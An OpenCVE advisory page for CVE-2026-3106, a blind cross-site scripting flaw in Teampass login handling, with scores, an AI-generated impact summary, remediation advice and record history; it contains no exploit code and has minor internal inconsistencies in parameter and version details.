Description
Blind Cross-Site Scripting (XSS) in Teampass, versions prior to 3.1.5.16, within the password manager login functionality in the 'contraseña' parameter of the login form 'redacted/index.php'. During failed authentication attempts, the application does not properly clean or encode the information entered by the user in the username field. As a result, arbitrary JavaScript code is automatically executed in the administrator's browser when viewing failed login entries, resulting in a blind XSS condition.
Published: 2026-03-31
Score: 9.3 Critical
EPSS: < 1% Very Low
KEV: No
Impact: Cross‑Site Scripting in Administrative Interface
Action: Immediate Patch
AI Analysis

Impact

Teampass versions older than 3.1.5.16 allow a blind Cross‑Site Scripting flaw in the login form’s "contraseña" parameter. When an authentication attempt fails, the entered username is displayed in the list of failed logins without proper encoding, causing arbitrary JavaScript to execute in the browser of an administrator who views that log. The flaw enables an attacker to run malicious code in the context of the admin session, potentially stealing session tokens, modifying data, or defacing the interface.

Affected Systems

The vulnerability affects all Teampass deployments running any version prior to 3.1.5.16. The fix is included in version 3.1.5.24, which supersedes all vulnerable releases.

Risk and Exploitability

The flaw carries a high CVSS score of 9.3. No EPSS score is available, and the vulnerability is not listed in the KEV catalog. A remote attacker can submit a crafted request to the login endpoint without prior authentication and trigger the XSS when an administrator later opens the failed‑login log. Because the exploit requires only that the administrator view the log, the attack is relatively easy to perform on exposed administrative interfaces, making the risk significant.

Generated by OpenCVE AI on March 31, 2026 at 10:50 UTC.

Remediation

Vendor Solution

The issue has been fixed in version 3.1.5.24.

OpenCVE Recommended Actions

  • Apply the official Teampass patch, upgrading to version 3.1.5.24 or later.
  • If a patch cannot be applied immediately, restrict administrative access to the login and log‑review pages and advise users to avoid clicking any suspicious links in the failed‑login logs.
  • Consider deploying a web application firewall or adding input validation to strip scripts from the "contraseña" parameter as a temporary safeguard.

Generated by OpenCVE AI on March 31, 2026 at 10:50 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Tue, 07 Apr 2026 18:00:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

Tue, 31 Mar 2026 18:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Tue, 31 Mar 2026 09:15:00 +0000

Type Values Removed Values Added
Description Blind Cross-Site Scripting (XSS) in Teampass, versions prior to 3.1.5.16, within the password manager login functionality in the 'contraseña' parameter of the login form 'redacted/index.php'. During failed authentication attempts, the application does not properly clean or encode the information entered by the user in the username field. As a result, arbitrary JavaScript code is automatically executed in the administrator's browser when viewing failed login entries, resulting in a blind XSS condition.
Title Multiple vulnerabilities in Teampass
First Time appeared Teampass
Teampass teampass
Weaknesses CWE-79
CPEs cpe:2.3:a:teampass:teampass:*:*:*:*:*:*:*:*
Vendors & Products Teampass
Teampass teampass
References
Metrics cvssV4_0

{'score': 9.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N'}

Subscriptions

Teampass Teampass
cve-icon MITRE

Status: PUBLISHED

Assigner: INCIBE

Published:

Updated: 2026-03-31T18:04:26.550Z

Reserved: 2026-02-24T10:44:55.903Z

Link: CVE-2026-3106

cve-icon Vulnrichment

Updated: 2026-03-31T15:02:25.268Z

cve-icon NVD

Status : Analyzed

Published: 2026-03-31T09:16:22.700

Modified: 2026-04-07T15:36:09.380

Link: CVE-2026-3106

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-03-31T20:39:20Z

Weaknesses